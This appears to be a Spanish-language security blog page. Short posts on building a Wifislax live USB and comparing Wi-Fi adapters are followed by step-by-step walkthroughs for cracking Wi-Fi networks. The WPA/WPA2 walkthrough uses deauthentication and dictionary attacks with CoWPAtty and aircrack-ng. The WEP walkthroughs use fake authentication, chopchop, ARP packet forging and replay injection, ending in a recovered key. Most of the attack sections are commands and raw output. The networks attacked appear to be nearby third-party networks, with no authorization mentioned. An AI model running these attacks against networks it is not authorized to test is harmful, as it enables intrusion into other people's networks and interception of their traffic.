Seguridad y Redes

Tips & Video Tutoriales, Wifislax, VMware, GNS3, VirtualBox, CCNA, Cisco Routers & Switches, [ Programming ]

Como crear un LiveUSB de Wifislax 4.11.1

WifiSlax es una distro GNU/Linux que se ejecuta en modo Live, es decir; no se instala físicamente en el disco duro, sino que se bootea desde un CD/DVD. Está pensada y diseñada para la auditoria de seguridad y relacionada con la seguridad informática en general e incluye una gran variedad de herramientas listas para ser utilizar. Hoy vamos a ver cómo crear un LiveUSB a partir de la imagen ISO.

Herramientas a Utilizar.
  • Imagen ISO de Wifislax.
  • Memoria USB de al menos 2 Gigas.
El primero paso que tenemos que hacer es descargar la ISO de WifiSlax desde su página oficial.

Nombre archivo: wifislax-4-11-1-final.iso 1.09 GB
Hash MD5: dd00c7cca12ab7bb7de76aeb73fd2565

Opciones de descarga:
El paso siguiente es preparar la memoria USB que vamos a utilizar, debemos de formatear con formato FAT32. Una vez descargado el Wifislax descomprimir el archivo de imagen ISO con algún descompresor (ejemplo Winrar) o el que utilicen habitualmente. Al terminar de descomprimir creara dos carpetas, una llamada Boot y la otra Wifislax. El siguiente paso será copiar estas dos carpetas a la memoria USB.

Una vez copiados las dos carpetas en la memoria usb, iremos a la carpeta Boot de la memoria usb y ejecutaremos el archivo llamado Wifislax Boot Installer.
 Wifislax Boot Installer.

Ejecutado el archivo nos aparecerá un mensaje de consola que nos pedirá la confirmación, ingresamos la tecla "s" para confirmar.


Con esto ya podremos arrancar Wifislax desde el USB. Por si tienen activado la UEFI es necesario desactivarlo desde la Bios para poder iniciar desde la USB y también deben asegurarse iniciar desde la USB como primera opción de arranque.


 Al iniciar con el LiveUSB nos aparecerá un menú donde podremos elegir varios modos de arranque, si tenemos menos de 4 GB de RAM seleccionamos “Arrancar con kernel NORMAL” y si cuenta con más memoria de la mencionada sería la opción de “Arrancar con kernel PAE”.

A continuación, podemos elegir entre KDE y Xfce como entorno gráfico.

Esperamos un poco y listo ya podremos utilizar el Wifislax desde la memoria USB.


Usuario: root
Pass: toor

FL-2016G, WiFiSKY, Alfa 2W y Kasens G5000

Después de que mis dispositivos andaban muy de vagos de prestarlas, represtarlas y requeteprestarlas a los familiares y amigos hoy mismo mis cuatro dispositivos las tengo en casa, estos dispositivos wifi con los cuales se puede realizar auditoria Wifi que por cierto de los cuatro dispositivos, tres traen consigo el famoso chipset rtl8187. La primera que compre fue el WiFiSKY 1500mw 20G, la segunda compra fue el Kasens G5000 (rtl8187). Después había leído comentarios buenos del FL-2016G (rtl8187) o también conocido como Dragon así que me anime a comprarla por Ebay y desafortunadamente  no trajo una placa azul, así que tener mucho cuidado si quieres comprarte la FL-2016G primero asegúrate de que traiga una placa azul y no una verde. Al final también me compre el Alfa 2W (Ralink RT2870/3070) el cual ocupo más ya que es muy bueno porque no le afecta tanto el ruido (muchos puntos de acceso) y la navegación es mas estable y es el único dispositivo el cual no he compartido :D Aquí una imagen de los dispositivos.

Y aquí unas pequeñas pruebas rápidas utilizando la herramienta inSSIDer que por cierto hay un versión nueva disponible en su página web http://www.metageek.net/products/inssider/. Y tal como se puede apreciar el FL-2016G no es el verdadero FL-2016G que trae una placa interna de color azul, la que tengo se trajo una placa verde y aquí su primera prueba donde solo ha detectado 17 redes, mientras los demás  dispositivos sobresalen muy bien.
FL-2016G
WiFiSKY 1500mw 20G
Kasens G5000
Alfa 2000mW
Espero mas adelante realizar unas pruebas y comparativas entre estos dispositivos, como realizando pings a distancia y pruebas en entornos de mucho ruido, muchas redes, en entornos de estilo rural con pocas redes etc. Sin mas, por ahora a seguir con mis practicas con el simulador GNS3 :)

Cracking WPA/WPA2 con CoWPAtty & Aircrack-ng

Aunque WPA (Wi-Fi Protected Access) es más seguro que WEP (Wired Equivalent Privacy), en el instante inicial en que la conexión se establece, WPA es más vulnerable que WEP ya que es necesario capturar un menor número de frames (solo es necesario capturar un total de 4 frames del handshake intercambiadas entre el cliente y el punto de acceso para llevar el descubrimiento de claves) para obtener la clave inicial de cifrado mediante ataques de diccionario.

WPA es vulnerable a un ataque de diccionario y para este ataque es necesario el obtener el 4 way handshake entre el cliente y el punto de acceso. Es necesario también un wordlist o diccionario de palabras. Luego, utilizando herramientas como CoWPAtty y Aircrack-ng intentar obtener la clave pre compartida de WPA/WPA2.

CoWPAtty fue creado por Joshua Wright http://www.willhackforsushi.com/?page_id=50 y tiene todas las características que uno podría desear de una buena herramienta sin salir de su propósito. Esta herramienta es para automatizar el ataque de diccionario a las redes WPA-PSK y es muy sencillo de utilizar. Lo primero que haremos es lanzara airodump-ng para seleccionar un objetivo.
root@bt:~# airodump-ng mon0
En buscando de un Objetivo.

Tal como podemos ver en la imagen anterior, hay dos clientes conectados a la red "Wireless" y tiene encriptación WPA, con cifrado TKIP. Ahora lo que haremos es lanzar airodump-ng para que escuche en el canal donde esta transmitiendo el punto de acceso que tenemos como objetivo, en este caso "Wireless" que esta transmitiendo en el canal 11 y despues lanzar el "Ataque 0 Deautenticación" para desautenticar a un cliente y así obtener el 4 way handshake.
root@bt:~# airodump-ng --channel 11 --bssid FX:XX:XX:XF:AB:7C --write wpademo mon0
Para obtener la captura completa de 4 frames del handshake, es necesario que haya al menos un cliente conectado o esperar a que un cliente se conecte (esto si eres muy paciente :D). Si hay un cliente conectado lo que se hará es realizar el ataque “-–deauth” o también conocido como “ataque 0” utilizando aireplay-ng y lo que sucederá aquí es, que desasociaremos al cliente conectado actualmente al punto de acceso y cuando se vuelve a conectar obtendremos los 4 frames del handshake. El detalle es que si no hay clientes conectados al punto de acceso, no podremos obtener la clave WPA ya que es necesario que haya clientes conectados o esperar que alguien se conecte al AP para la obtención del four-way handshake.

Bueno en mi caso lo que hare es desautenticar el cliente con direccion MAC "0C:XX:76:XX:D5:5B" del ESSID "Wireless".
root@bt:~# aireplay-ng --deauth 1 -a FX:XX:XX:XF:AB:7C -c 00:60:76:71:D5:5B mon0

Desautentificación de un cliente wifi.

He desasociado al cliente del punto del acceso, ahora el cliente lo que hará es volver a reautenticarse y es entonces cuando obtendremos los 4 paquetes del handshake. En la reautenticación se generarán los 4 paquetes de autenticación (handshake) en los que estamos interesados en capturar. Después estos paquetes los usaremos para intentar obtener la clave precompartida WPA/WPA2.

Bueno ahora pongan atención en la siguiente imagen donde se muestra una sesión de airodump-ng y en la parte superior de la imagen se muestra un mensaje "WPA handshake F4:C7:14:6F:AB:7". El four-way handshake ha sido capturado.

Four-way handshake capturado.

Tal y como se muestra en la imagen anterior, hemos obtenido los 4 paquetes handshake. Estos cuatro paquetes como lo mencionamos anteriormente los utilizaremos para obtener la clave WPA/WPA2 precompartida. Para esto necesitaremos un wordlist o diccionario de palabras, el cual contiene la contraseña de WPA/WPA2-PSK.

Antes de pasar al siguiente paso, ahora lo que haremos es detener airodump-ng y abriremos el archivos ".cap" capturado con Wireshark para ver el “four-way handshake”. El archivo debe ser algo similar a la siguiente captura.

EAPOL Key

Bueno ahora lo que haremos es empezar el crackeo, para esto necesitaremos un wordlist y es aquí donde entra en juego CoWPAtty. Debemos de indicarle a CoWPAtty la ruta donde tenemos el wordlist o diccionario de palabras, también la captura del four-way handshake y por ultimo el SSID de la red wifi, que en este caso es "Wireless". Básicamente lo que hara CoWPAtty es ir comprobando cada una de esas palabras que contiene el diccionario si coincide con la clave. Este proceso todo será dependiendo de la velocidad de nuestro CPU, también de la calidad y el tamaño del diccionario de palabras (wordlist), esto puede llevar bastante tiempo, incluso días o años jeje si eres impaciente puedes esperar :D. Bueno Lanzamos CoWPAtty desde consola.
root@bt:~# cowpatty -r wpademo-02.cap -f /pentest/passwords/john/password.lst -2 -s Wireless
El Crackeo con CoWPAtty ha tenido éxito.

Para especificar nuestro diccionario de palabras lo hacemos con el parámetro –f (-f /pentest/passwords/john/password.lst), el SSID con el parámetro –s (-s Wireless) y el archivo capturado con el parámetro –r (-r wpademo-02.cap). El ultimo parámetro -2, es el modo no estricto, esto se requiere cuando no tenemos capturados los 4 frames del handshake, es decir el paquete completo. Por cierto una opción bastante buena.

En este ejemplo he utilizado un diccionario de palabras que lo trae incluido BackTrack de John the Ripper, el archivo se encuentra en el directorio /pentest/passwords/john/password.lst

Es importante comentar que para el crackeo de WPA debemos de tener un muy buen diccionario de palabras. La distribución de BackTrack incluye unos cuantos diccionarios pero estos puede que no sean suficientes, para esto deben de buscar en Google o igual existen generadores de palabras que automatizan este proceso de generar diccionarios.

Ahora veamos un ejemplo final utilizando Aircrak-ng. Vamos a especificar la ruta de nuestro diccionario con el parámetro –w (-w /pentest/passwords/john/password.lst) y nuestro archivo de captura (wpademo-02.cap).
root@bt:~# aircrack-ng -w /pentest/passwords/john/password.lst wpademo-02.cap
Aircrack-ng en Acción.

Para el crackeo de WPA2 el proceso es el mismo, no hay diferencia. También hay que tener muy en cuenta de que al tratarse de un ataque de diccionario el requisito previo es que la contraseña debe estar en el diccionario de palabras que le estamos indicando, si la frase u contraseña no se encuentra en el diccionario, el ataque no tendrá éxito.

USB FL-2016G con chipset RTL8187 en Ubuntu 11.10

Aquí se muestra el FL-2016G en acción desde Ubuntu en su versión 11.10. El FL-2016G es un dispositivo USB también conocido como el dragon que trae consigo el chipset rtl8187, inyecta muy bien, aunque me quedo con el alfa 2000mw, pero la ventaja es de que no es un dispositivo caro, yo la compre en 20 dolares por Ebay, el alfa me costo un poco mas pero si que valió la pena comprarla, me ha servido para todo, hasta como AP :).
Bueno como un usuario me ha enviado un mensaje preguntando como es el proceso para auditar con el FL-2016, aquí esta. Aunque el proceso es el mismo para todos los dispositivos, es cuestión de lanzar airmon-ng y mirar si detecta nuestro dispositivo USB, si no detecta podría ser necesaria parchear los drivers con el Compat-Wireless.

Bueno lo primero lanzamos airmon-ng. Para esto iniciamos el script airmon-ng tal como se muestra a continuación. Wlan2 es la interface como es reconocido nuestro dispositivo en Ubuntu.

root@computer:/home/delfi# airmon-ng start wlan2.
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
997 avahi-daemon
998 avahi-daemon
999 NetworkManager
19973 wpa_supplicant
21950 dhclient
Process with PID 21950 (dhclient) is running on interface wlan1

Interface Chipset  Driver

wlan1  Unknown  rt2800usb - [phy0]
wlan2  RTL8187  rtl8187 - [phy1]
(monitor mode enabled on mon0)
Una vez que hemos puesto el FL-2016G en modo monitor, podremos lanzar airodump-ng para escanear las redes que están a nuestro alcance para poder elegir un objetivo y centrarnos en una red en concreto.

root@computer:/home/delfi# airodump-ng mon0
CH 10 ][ Elapsed: 4 s ][ 2011-11-30 03:04                               
                                                                                                          
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                     
                                                                                                          
08:76:FF:XX:XX:A4  -50       11        0    0   9  54e  WEP  WEP         INFINITUMXXXXA                           
64:16:F0:31:XX:CD  -61        9        0    0  11  54   WEP  WEP         INFINITUM74XX                             
00:18:3F:01:06:XX  -62        2        0    0  11  54 . WEP  WEP         INFINITUM97XX                             
00:21:7C:C6:XX:XX  -62        6        0    0   1  54 . WPA2 CCMP   PSK  Juanjo                                    
98:2C:BE:10:ED:72  -60        7        0    0   1  54   WEP  WEP         INFINITUMXX31                             
F4:C7:14:6F:AB:7C  -63        4        0    0  11  54e  WEP  WEP         GREGORIO                                  
5C:4C:A9:67:18:B4  -64        4        0    0   1  54e  WEP  WEP         INFINITUMXXb4                             
00:E0:4C:XX:53:XX  -67        2        0    0  11  54   WEP  WEP         PAKORP                                    
                                                                                                          
BSSID              STATION            PWR   Rate    Lost  Packets  Probes


Una vez elegido el objetivo, lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB em modo monitor (mon0) en el canal (11) donde esta trasmitiendo el punto de acceso (64:16:F0:31:68:CD), el parametro --write es el nombre del archivo de nuestra captura.

root@computer:/home/delfi# airodump-ng --bssid 64:16:F0:31:68:CD --channel 11 --write wifikey mon0
CH 11 ][ Elapsed: 5 mins ][ 2011-11-30 03:09                               
                                                                                                          
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                 
                                                                                                          
64:16:F0:XX:XX:CD  -60   0     2286    29042   76  11  54   WEP  WEP    OPN  INFINITUM7XX9                         
                                                                                                          
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                          
                                                                                                          
64:16:F0:31:XX:XX  00:C0:CA:40:XX:XX    0    0 - 1   1317340   151601

Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.

root@computer:/home/delfi# aireplay-ng --fakeauth 0 -e INFINITUM7XX9 -a 64:16:F0:31:68:CD -h 00:C0:CA:40:B8:3E mon0
03:04:54  Waiting for beacon frame (BSSID: 64:16:F0:31:68:CD) on channel 11
03:04:55  Sending Authentication Request (Open System)
03:04:55  Authentication successful
03:04:55  Sending Association Request
03:04:55  Association successful :-) (AID: 1)


Tal como podemos ver, nos hemos asociado correctamente. lanzamos el ataque chopchop con el siguiente comando --chopchop o -4. En este caso el paramentro--chopchop significa que realizaremos el ataque chopchop, -b la dirección MAC del punto de acceso, -h la dirección MAC de nuestro dispositivo inalambrico y el mon0 es tal como es reconocido nuestro dispositivo.

root@computer:/home/delfi# aireplay-ng --chopchop -b 64:16:F0:XX:XX:XX -h 00:C0:CA:XX:XX:3E mon0
03:04:58  Waiting for beacon frame (BSSID: 64:16:F0:31:68:CD) on channel 11
Read 3616 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

    BSSID  =  64:16:F0:XX:XX:CD
Dest. MAC  =  01:00:5E:00:XX:XX
Source MAC  =  64:16:F0:31:XX:XX

0x0000:  0842 0000 0100 5e00 0001 6416 f031 68cd  .B....^...d..1h.
0x0010:  6416 f031 68cd f089 e15e 4800 224d e95a  d..1h....^H."M.Z
0x0020:  f191 7a17 92fd 494c e866 d7fe 7200 d979  ..z...IL.f..r..y
0x0030:  8c57 92db d5ed 59c3 5a63 c78c e09c fc82  .W....Y.Zc......
0x0040:  0269 8709 952a 7d4a 443f 2139 3843 0fd5  .i...*}JD?!98C..
0x0050:  e2ff 3aea e1aa                           ..:...

Use this packet ? y

Saving chosen packet in replay_src-1130-030631.cap

Offset   85 ( 0% done) | xor = 89 | pt = 23 |   78 frames written in  1342ms
Offset   84 ( 1% done) | xor = 94 | pt = 75 |  489 frames written in  8297ms
Offset   83 ( 3% done) | xor = BE | pt = 54 | 1785 frames written in 30360ms
Offset   82 ( 5% done) | xor = 3E | pt = 04 |  579 frames written in  9843ms
Offset   81 ( 7% done) | xor = FF | pt = 00 |  667 frames written in 11338ms
Offset   80 ( 9% done) | xor = E2 | pt = 00 |   77 frames written in  1309ms
Offset   79 (11% done) | xor = D5 | pt = 00 |  239 frames written in  4064ms
Offset   78 (13% done) | xor = 0F | pt = 00 |  238 frames written in  4047ms
Offset   77 (15% done) | xor = 42 | pt = 01 |  650 frames written in 11048ms
Offset   76 (17% done) | xor = 38 | pt = 00 |  273 frames written in  4642ms
Offset   75 (19% done) | xor = 39 | pt = 00 |  133 frames written in  2249ms
Offset   74 (21% done) | xor = 21 | pt = 00 |  701 frames written in 11929ms
Offset   73 (23% done) | xor = 57 | pt = 68 |   57 frames written in   969ms
Offset   72 (25% done) | xor = 30 | pt = 74 |  418 frames written in  7103ms
Offset   71 (26% done) | xor = EA | pt = A0 |  606 frames written in 10304ms
Offset   70 (28% done) | xor = E5 | pt = 98 |  482 frames written in  8194ms
Offset   69 (30% done) | xor = 0A | pt = 20 |  244 frames written in  4149ms
Offset   68 (32% done) | xor = 95 | pt = 00 |  244 frames written in  4147ms
Offset   67 (34% done) | xor = E2 | pt = EB |  404 frames written in  6869ms
Offset   66 (36% done) | xor = 93 | pt = 14 |  185 frames written in  3136ms
Offset   65 (38% done) | xor = E9 | pt = 80 |  436 frames written in  7408ms
Offset   64 (40% done) | xor = DE | pt = DC |  197 frames written in  3360ms
Offset   63 (42% done) | xor = 82 | pt = 00 |  192 frames written in  3264ms
Offset   62 (44% done) | xor = FC | pt = 00 |  194 frames written in  3297ms
Offset   61 (46% done) | xor = 9C | pt = 00 |  815 frames written in 13856ms
Offset   60 (48% done) | xor = E0 | pt = 00 | 1468 frames written in 24945ms
Offset   59 (50% done) | xor = 17 | pt = 9B |  316 frames written in  5383ms
Offset   58 (51% done) | xor = 29 | pt = EE |  230 frames written in  3909ms
Offset   57 (53% done) | xor = 07 | pt = 64 |   76 frames written in  1293ms
Offset   56 (55% done) | xor = 4B | pt = 11 |   99 frames written in  1684ms
Offset   55 (57% done) | xor = C2 | pt = 01 |  120 frames written in  2037ms
Offset   54 (59% done) | xor = 59 | pt = 00 |  192 frames written in  3266ms
Offset   53 (61% done) | xor = ED | pt = 00 |  177 frames written in  2998ms
Offset   52 (63% done) | xor = 35 | pt = E0 |   63 frames written in  1081ms
Offset   51 (65% done) | xor = 25 | pt = FE |   75 frames written in  1272ms
Offset   50 (67% done) | xor = 93 | pt = 01 |  147 frames written in  2503ms
Offset   49 (69% done) | xor = FF | pt = A8 |  229 frames written in  3892ms
Offset   48 (71% done) | xor = 4C | pt = C0 |  179 frames written in  3043ms
Offset   47 (73% done) | xor = EF | pt = 96 |  690 frames written in 11730ms
Offset   46 (75% done) | xor = D1 | pt = 08 |  295 frames written in  5014ms
Offset   45 (76% done) | xor = 02 | pt = 02 |  575 frames written in  9775ms
Offset   44 (78% done) | xor = 73 | pt = 01 |  249 frames written in  4233ms
Offset   43 (80% done) | xor = FE | pt = 00 |   67 frames written in  1140ms
Offset   42 (82% done) | xor = D7 | pt = 00 |  296 frames written in  5020ms
Offset   41 (84% done) | xor = C5 | pt = A3 |   97 frames written in  1660ms
Offset   40 (86% done) | xor = E6 | pt = 0E |   20 frames written in   341ms
Offset   39 (88% done) | xor = 50 | pt = 1C |  370 frames written in  6293ms
Offset   38 (90% done) | xor = 49 | pt = 00 |  228 frames written in  3869ms
Offset   37 (92% done) | xor = FD | pt = 00 |  231 frames written in  3930ms
Offset   36 (94% done) | xor = D7 | pt = 45 |  789 frames written in 13414ms
Offset   35 (96% done) | xor = 17 | pt = 00 |  229 frames written in  3892ms
Offset   34 (98% done) | xor = 72 | pt = 08 |  147 frames written in  2499ms

Saving plaintext in replay_dec-1130-030713.cap
Saving keystream in replay_dec-1130-030713.xor

Completed in 39s (1.23 bytes/s)


Como se mira en el código e imagen anterior, tuvimos éxito con el ataque chopchop. El archivo llamado keystream in replay_dec-1130-030713.xor lo utilizaremos para generar un paquete ARP con el famoso packetforge-ng. Nuestro objetivo es que el punto de acceso reenvié continuamente el paquete arp inyectado. Cuando lo reenvié obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.

root@computer:/home/delfi# packetforge-ng -0 -a 64:16:F0:31:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -yreplay_dec-1130-030713.xor -w ARP
Wrote packet to: ARP

Ahora la inyección del paquete ARP.
root@computer:/home/delfi# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:40:B8:3E)
Size: 68, FromDS: 0, ToDS: 1 (WEP)

    BSSID  =  64:16:F0:XX:XX:XX
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:C0:CA:40:XX:XX

0x0000:  0841 0201 6416 f031 68cd 00c0 ca40 b83e  .A..d..1h....@.>
0x0010:  ffff ffff ffff 8001 e15e 4800 224d e95a  .........^H."M.Z
0x0020:  f191 7a11 d7fc 4150 e0c1 d7ff 73c2 1baf  ..z...AP....s...
0x0030:  f4c1 6cda ca12 59c2 4b07 2917 1f63 037d  ..l...Y.K.)..c.}
0x0040:  2df5 fa27                                -..'

Use this packet ? y

Saving chosen packet in replay_src-1130-030729.cap
You should also start airodump-ng to capture replies.
Por ultimo, una vez capturado los suficientes #datas, lanzamos aircrack-ng.

delfi@computer:~$ aircrack-ng wifikey-01.cap

Opening wifikey-01.cap
Read 163102 packets.

#  BSSID              ESSID                     Encryption

1  64:16:F0:XX:XX:XX  INFINITUM7XX9             WEP (25237 IVs)

Choosing first network as target.

Opening wifikey-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 25237 ivs.
                                              Aircrack-ng 1.1

                              [00:00:07] Tested 83141 keys (got 25192 IVs)

KB    depth   byte(vote)
0    0/  1   37(41728) 47(35840) 3C(34560) EA(33280) 68(32768) 93(32768) 0E(32512) DC(32512) 39(32256)
1   23/ 26   BD(30464) 7F(30208) 9A(30208) BB(30208) BE(30208) C4(30208) 76(29696) B1(29696) D4(29696)
2    0/ 19   61(34560) 16(33536) 2F(33536) ED(33024) 19(33024) EF(32768) 01(32512) 9D(32256) 9E(31488)
3    2/ 25   31(33280) 08(33280) 77(33024) C9(32768) D3(32768) B9(32512) 74(32256) BE(31744) 48(31744)
4    0/  7   63(36096) A2(33024) BB(32512) 51(32512) C6(32256) A4(32000) F5(32000) 07(31744) 1F(31744)

           KEY FOUND! [ 37:63:61:31:63 ] (ASCII: 7ca1c )
Decrypted correctly: 100%


Video: USB FL-2016G en acción desde Ubuntu 11.10

Vídeo Online
http://www.youtube.com/watch?v=rFUMPgYkGPM

Ataque 4: Ataque chopchop + Ataque 2 : Interactive Packet Replay

Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin necesidad de conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela únicamente el texto plano. De cualquier modo, algunos puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Si el punto de acceso tira paquetes menores de 42 bytes, aireplay intenta adivinar el resto de los datos, tan pronto como el encabezado (headers) sea predecible. Si un paquete IP es capturado, automáticamente comprueba el checksum del encabezado para ver si es correcto, y despues trata de adivinar las partes que le faltan. Este ataque requiere como mínimo un paquete de datos WEP.

Modo Monitor con Airmon-ng

Nuestro primer paso sera poner nuestro dispositivo inalambrico en modo Monitor. El modo monitor es un modo especial que se usa para capturar paquetes wireles 802.11. Para esto iniciamos el script airmon-ng tal como se muestra a continuación.
root@bt:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID       Name
1232      dhclient3
2118      dhclient3
Process   with PID 2082 (ifup) is running on interface wlan0
Process   with PID 2118 (dhclient3) is running on interface wlan0

Interface         Chipset           Driver

wlan0             Ralink RT2870/3070       rt2800usb - [phy1]
                 (monitor mode enabled on mon0)
root@bt:~#
Ahora lanzamos airodump-ng para escanear las redes que están a nuestro alcance y asi poder elegir una red en especifico.
root@bt:~# airodump-ng mon0

CH  2 ][ Elapsed: 8 s ][ 2011-06-07 12:39                          
                                                            
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                            
00:18:3F:18:85:C9  -127        4        2    0   6  54 . WEP  WEP         2WIRE974
                                                            
BSSID              STATION            PWR   Rate    Lost  Packets  Probes 
                                                            
00:18:3F:18:85:C9  0C:60:76:71:D5:5B  -127    0 -54      0        1         

root@bt:~#
Elegimos la red objetivo y lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB (mon0) en el canal (6) donde esta trasmitiendo el punto de acceso (00:18:3F:18:85:C9).
root@bt:~# airodump-ng -c 6 -w captura --bssid 00:18:3F:18:85:C9 mon0

Con el parámetro --bssid indicamos la dirección MAC del punto de acceso, -c indicamos el numero de canal y el parámetro -w ponemos el nombre del archivo donde se guardaran los datos.
 CH  6 ][ Elapsed: 1 min ][ 2011-06-07 12:55 ][ Decloak: 00:18:3F:18:85:C9 
                                                            
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                            
00:18:3F:18:85:C9  -127  93      909     241    2  6  54 . WEP  WEP    OPN  2WIRE974
                                                            
BSSID              STATION            PWR   Rate    Lost  Packets  Probes 
                                                            
00:18:3F:18:85:C9  00:C0:CA:4A:82:97    0    0 - 1      0 9638
Ataque 1: Falsa Autenticación

Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.
root@bt:~# aireplay-ng -1 0 -e 2WIRE974 -a 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 mon0
12:54:37  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6

12:54:37  Sending Authentication Request (Open System) [ACK]
12:54:38  Authentication successful
12:54:38  Sending Association Request [ACK]
12:54:38  Association successful :-) (AID: 1)
Ataque 4: Ataque Chopchop

Una vez autenticado correctamente lanzamos el ataque chopchop con el siguiente comando. El -4 significa que realizaremos el ataque chopchop, -b la dirección MAC del punto de acceso, -h la dirección MAC de nuestro dispositivo inalambrico y el mon0 es tal como es reconocido nuestro dispositivo.
root@bt:~# aireplay-ng -4 -b 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 mon0
12:54:48  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6


Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID  =  00:18:3F:18:85:C9
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:18:3F:18:85:C9

0x0000:  0842 3a01 ffff ffff ffff 0018 3f18 85c9  .B:.........?...
0x0010:  0018 3f18 85c9 d06e 3f5d 5c00 0695 56a5  ..?....n?]\...V.
0x0020:  05bb c1d0 3adf e8c9 d3db da6a 5fc0 a283  ....:......j_...
0x0030:  e901 d215 c1a4 5a7a efc0 ea3f 255f 0c69  ......Zz...?%_.i
0x0040:  a4d8 6b51                                ..kQ

Use this packet ? y

Saving chosen packet in replay_src-0607-125448.cap

Offset   67 ( 0% done) | xor = 03 | pt = 52 |  234 frames written in  3993ms
Offset   66 ( 2% done) | xor = 81 | pt = EA |  167 frames written in  2833ms
Offset   65 ( 5% done) | xor = 6F | pt = B7 |   85 frames written in  1446ms
Offset   64 ( 8% done) | xor = 10 | pt = B4 |  197 frames written in  3348ms
Offset   63 (11% done) | xor = 2A | pt = 43 |  171 frames written in  2901ms
Offset   62 (14% done) | xor = 0D | pt = 01 |  126 frames written in  2148ms
Offset   61 (17% done) | xor = F7 | pt = A8 |  212 frames written in  3609ms
Offset   60 (20% done) | xor = E5 | pt = C0 |  216 frames written in  3670ms
Offset   59 (23% done) | xor = C0 | pt = FF |  186 frames written in  3156ms
Offset   58 (26% done) | xor = 15 | pt = FF |   59 frames written in  1008ms
Offset   57 (29% done) | xor = 3F | pt = FF |   43 frames written in   731ms
Offset   56 (32% done) | xor = 10 | pt = FF |   91 frames written in  1545ms
Offset   55 (35% done) | xor = 85 | pt = FF |   73 frames written in  1248ms
Offset   54 (38% done) | xor = A5 | pt = FF |   29 frames written in   487ms
Offset   53 (41% done) | xor = 5A | pt = FE |  214 frames written in  3629ms
Offset   52 (44% done) | xor = C0 | pt = 01 |   43 frames written in   742ms
Offset   51 (47% done) | xor = BD | pt = A8 |  137 frames written in  2322ms
Offset   50 (50% done) | xor = 12 | pt = C0 |   35 frames written in   606ms
Offset   49 (52% done) | xor = C8 | pt = C9 |  223 frames written in  3783ms
Offset   48 (55% done) | xor = 6C | pt = 85 |   47 frames written in   801ms
Offset   47 (58% done) | xor = 9B | pt = 18 |   64 frames written in  1087ms
Offset   46 (61% done) | xor = 9D | pt = 3F |  252 frames written in  4287ms
Offset   45 (64% done) | xor = D8 | pt = 18 |  108 frames written in  1836ms
Offset   44 (67% done) | xor = 5F | pt = 00 |  241 frames written in  4099ms
Offset   43 (70% done) | xor = 6B | pt = 01 |  193 frames written in  3282ms
Offset   42 (73% done) | xor = DA | pt = 00 |   98 frames written in  1660ms
Offset   41 (76% done) | xor = DF | pt = 04 |  163 frames written in  2773ms
Offset   40 (79% done) | xor = D5 | pt = 06 |   68 frames written in  1157ms
Sent 1000 packets, current guess: E4...

The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0607-125543.cap
Saving keystream in replay_dec-0607-125543.xor

Completed in 40s (0.75 bytes/s)
Como se puede observar, tuvimos exito con el ataque chopchop. El archivo llamado keystream in replay_dec-0607-125543.xor lo utilizaremos para generar un paquete ARP con el famoso packetforge-ng. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@bt:~# packetforge-ng -0 -a 00:18:3F:18:85:C9 -h 00:C0:CA:4A:82:97 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0607-125543.xor -w ARP
Wrote packet to: ARP
Ataque 2: Interactive Packet Replay

Inyección del paquete ARP con areplay-ng.
root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:4A:82:97)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID  =  00:18:3F:18:85:C9
Dest. MAC  =  FF:FF:FF:FF:FF:FF
Source MAC  =  00:C0:CA:4A:82:97

0x0000:  0841 0201 0018 3f18 85c9 00c0 ca4a 8297  .A....?......J..
0x0010:  ffff ffff ffff 8001 3f5d 5c00 0695 56a5  ........?]\...V.
0x0020:  05bb c1d0 3adf e8c9 d3db da6a 5f18 57d1  ....:......j_.W.
0x0030:  ee5f ed42 3fa5 a585 103f 15c0 1a08 f2d5  ._.B?....?......
0x0040:  3f8a 5f41                                ?._A

Use this packet ? y

Saving chosen packet in replay_src-0607-125633.cap
You should also start airodump-ng to capture replies.

Sent 16265 packets... (500pps)
